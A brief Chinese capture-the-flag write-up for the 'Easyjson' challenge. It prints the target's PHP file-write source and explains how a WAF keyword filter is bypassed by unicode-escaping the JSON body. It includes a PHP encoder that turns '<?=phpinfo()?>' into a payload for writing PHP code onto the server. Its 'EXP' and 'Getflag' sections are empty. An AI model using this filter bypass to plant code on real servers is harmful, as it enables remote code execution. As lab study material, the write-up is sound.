前言
太菜了只做了一道
Easyjson
- 代码审计
<?php
include 'security.php';
if(!isset($_GET['source'])){
show_source(__FILE__);
die();
}
$sandbox = 'sandbox/'.sha1($_SERVER['HTTP_X_FORWARDED_FOR']).'/';
var_dump($sandbox);
if(!file_exists($sandbox)){
mkdir($sandbox);
file_put_contents($sandbox."index.php","<?php echo 'Welcome To Dbapp OSS.';?>");
}
$action = $_GET['action'];
$content = file_get_contents("php://input");
if($action == "write" && SecurityCheck('filename',$_GET['filename']) &&SecurityCheck('content',$content)){
$content = json_decode($content);
$filename = $_GET['filename'];
$filecontent = $content->content;
$filename = $sandbox.$filename;
file_put_contents($filename,$filecontent."\n Powered By Dbapp OSS.");
}elseif($action == "reset"){
$files = scandir($sandbox);
foreach($files as $file) {
if(!is_dir($file)){
if($file !== "index.php"){
unlink($sandbox.$file);
}
}
}
}
else{
die('Security Check Failed.');
}
- 代码主要部分在,但是这里有一个waf对文件名和content参数进行过滤。简单Fuzz了一下,filename可以使用php后缀,说明可以写php文件,但是有一个很关键的问题就是
content
它传来必须是一个json,json中有一个属性是content,例如:{'content':'<?=phpinfo()?>'}
但是waf
对json进行了过滤,不能存在content这个字符串(还过滤了其他关键字)。
if($action == "write" && SecurityCheck('filename',$_GET['filename']) &&SecurityCheck('content',$content)){
$content = json_decode($content);
$filename = $_GET['filename'];
$filecontent = $content->content;
$filename = $sandbox.$filename;
file_put_contents($filename,$filecontent."\n Powered By Dbapp OSS.");
}
- 神小密圈发现,json支持的字符中可以支持unicode编码,那么我们全都用unicode编码来代替字符串不就行了?
- 简单测试一下发现可以.Unicode表
- 简单写个脚本来将字符串转化为unicode编码。
<?php
function unicode_encode($str){
$table = [
'\u002'=>[' ','!','"','#','$','%','&','\'','(',')','*','+',',','-','.','/'],
'\u003'=>['0','1','2','3','4','5','6','7','8','9',':',';','<','=','>','?'],
'\u004'=>['@','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O'],
'\u005'=>['P','Q','R','S','T','U','V','W','X','Y','Z','[','\\',']','^','_'],
'\u006'=>['`','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o'],
'\u007'=>['p','q','r','s','t','u','v','w','x','y','z','{','|','}','~']
];
foreach ($table as $key => $value) {
$i = 0;
foreach ($value as $vcode) {
$i=$i+1;
if($str==$vcode){
return $key.bin2e($i-1);
}
}
}
}
function bin2e($str){
switch ($str) {
case '10':
return 'a';
break;
case '11':
return 'b';
break;
case '12':
return 'c';
break;
case '13':
return 'd';
break;
case '14':
return 'e';
break;
case '15':
return 'f';
break;
default:
return $str;
break;
}
}
function main($str){
for($i=0;$i<strlen($str);$i++){
echo unicode_encode($str[$i]);
}
}
main('<?=phpinfo()?>');
?>
- EXP
- Getflag